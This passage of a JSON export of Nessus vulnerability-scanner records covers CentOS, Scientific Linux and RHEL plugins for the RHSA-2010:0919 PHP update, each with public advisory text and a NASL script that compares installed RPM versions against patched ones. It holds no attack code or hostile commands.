"2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php", "p-cpe:/a:centos:centos:php-bcmath", "p-cpe:/a:centos:centos:php-cli", "p-cpe:/a:centos:centos:php-common", "p-cpe:/a:centos:centos:php-dba", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-domxml", "p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-ncurses", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-pdo", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-soap", "p-cpe:/a:centos:centos:php-xml", "p-cpe:/a:centos:centos:php-xmlrpc", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2010-0919.NASL", "href": "https://www.tenable.com/plugins/nessus/50862", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0919 and \n# CentOS Errata and Security Advisory 2010:0919 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50862);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_bugtraq_id(38430, 38708, 41991, 44605, 44889);\n script_xref(name:\"RHSA\", value:\"2010:0919\");\n\n script_name(english:\"CentOS 4 / 5 : php (CESA-2010:0919)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-December/017205.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1573b130\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-December/017206.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f265b3da\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-November/017197.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b2b40099\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-November/017198.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?409943b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T14:48:26", "description": "An input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAfter installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : php on SL4.x, SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101129_PHP_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60908);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n\n script_name(english:\"Scientific Linux Security Update : php on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAfter installing the updated packages, the httpd daemon must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1011&L=scientific-linux-errata&T=0&P=1564\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a48d3681\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:35:08", "description": "Updated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : php (RHSA-2010:0919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-domxml", "p-cpe:/a:redhat:enterprise_linux:php-gd", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2010-0919.NASL", "href": "https://www.tenable.com/plugins/nessus/50841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0919. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50841);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_bugtraq_id(38430, 38708, 41991, 44605, 44889);\n script_xref(name:\"RHSA\", value:\"2010:0919\");\n\n script_name(english:\"RHEL 4 / 5 : php (RHSA-2010:0919)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. If some fatal error occurred during the\nexecution of this function (such as the 